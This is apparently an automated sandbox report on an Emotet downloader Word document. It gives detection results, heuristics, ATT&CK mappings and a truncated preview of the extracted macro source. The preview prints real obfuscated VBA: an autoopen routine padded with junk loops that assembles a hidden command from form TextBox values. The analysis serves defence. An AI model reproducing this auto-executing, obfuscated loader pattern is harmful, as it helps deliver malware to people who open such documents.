MALICIOUS
282
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1071.001 Web Protocols
The sample is identified as malicious by ClamAV with a specific detection name associated with Emotet. Heuristics indicate the presence of an obfuscated auto-executing VBA loader that uses GetObject and execution sinks, strongly suggesting it downloads and executes a second-stage payload. The VBA macros are the primary mechanism for this malicious activity.
Heuristics 8
-
ClamAV: Doc.Downloader.Emotet-10001946-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-10001946-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9079 bytes |
SHA-256: 410ee80eb334a4c731b5d126b46c1f93aec566541f9acaa4ccdd74386890c17e |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "C41355"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "p479940, 0, 0, MSForms, TextBox"
Attribute VB_Control = "z_6296_6, 1, 1, MSForms, TextBox"
Attribute VB_Control = "Q_9934, 2, 2, MSForms, TextBox"
Attribute VB_Control = "L586445, 3, 3, MSForms, TextBox"
Attribute VB_Control = "U3162544, 4, 4, MSForms, TextBox"
Attribute VB_Control = "N6111574, 5, 5, MSForms, TextBox"
Attribute VB_Name = "h5_876_"
Attribute VB_Name = "u977642"
Function j50187(P396241)
While E637531_ _
And _
z6883220
d7794043 = "K222412"
N69_340 = "F0528546"
Q6_9606 = "833382143"
P2_2553 = "813939108"
V557283 = "n90388_"
Wend
While J939_0 _
And _
w0_93_
B2058870 = "s25_3_"
l44336 = "Z5_30_8"
p268634 = "849633288"
E81819_3 = "563013670"
z5543309 = "X2759573"
Wend
Set j50187 = CVar(P396241)
While r2_29995 _
And _
Y0972_
K20625 = "S76758"
z426_6 = "q55_38_"
G9404173 = "627235485"
s48957 = "614544410"
G3985881 = "i7173_24"
Wend
While W3312_1 _
And _
O2715932
X1811_ = "O887361"
j943232 = "A37058"
j6822265 = "749785511"
j_2_33 = "521213248"
z40711_ = "T4_66075"
Wend
While L4669418 _
And _
j70500
i61663 = "v8286705"
Z38000_ = "a33070"
A08934 = "822617055"
c_81869 = "273596095"
i98272_ = "l9701596"
Wend
End Function
Sub _
_
_
autoopen()
On Error Resume Next
While A73890 _
And _
P5285__3
d520432 = "B9941630"
h13672_ = "B0592457"
P17515 = "994401364"
C23289 = "671879029"
w79594 = "i1718_58"
Wend
While M96158 _
And _
C613_900
P35_7808 = "l90837_9"
V48732 = "C4268791"
K02808 = "168230370"
S1492495 = "22061743"
j6308683 = "t2_877"
Wend
While B68171 _
And _
d5262_7
X4244934 = "U188217"
z16_8819 = "v752375"
l9683804 = "919772961"
Y75908_5 = "426907968"
C3959_ = "F969016"
Wend
L8942331
While C896457_ _
And _
H82967
E33592_ = "D786_514"
z976334_ = "d31776"
i077_56 = "381557287"
J3158_3 = "867820558"
E3635450 = "v63770"
Wend
While E21_961 _
And _
U642445
w2665521 = "n6808944"
S1_3_45 = "L9791042"
k08014_9 = "595952756"
z1926_3 = "262428734"
z95533 = "C579618"
Wend
While k267_02 _
And _
Y9581585
a2671343 = "t94577"
v4995_0 = "j2_0_323"
c55772 = "975880155"
Z126__64 = "962471819"
Z8348213 = "I244036"
Wend
End Sub
Attribute VB_Name = "F197993_"
Function L8942331()
On Error Resume Next
While i36869 _
And _
l_039449
M38537 = "Q377510"
Q361_249 = "B419470"
h4___3 = "456836531"
G69597 = "964266366"
H32576 = "A363_626"
Wend
While D806384 _
And _
X2_92326
w408222 = "c603265"
j3850672 = "T67_356"
D842_0 = "425744602"
w038940 = "842110806"
a511794 = "d7076352"
Wend
b94_1494 = C41355.N6111574 + C41355.z_6296_6 + C41355.N6111574 + C41355.Q_9934 + C41355.N6111574 + C41355.N6111574 + C41355.L586445 + C41355.N6111574 + C41355.N6111574 + C41355.U3162544 + C41355.N6111574 + C41355.p479940 + C41355.N6111574
While X6919_3 _
And _
i52517
z560019 = "t590782"
A0232128 = "b_7069"
r776113 = "48777659"
O19_64 = "583332642"
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.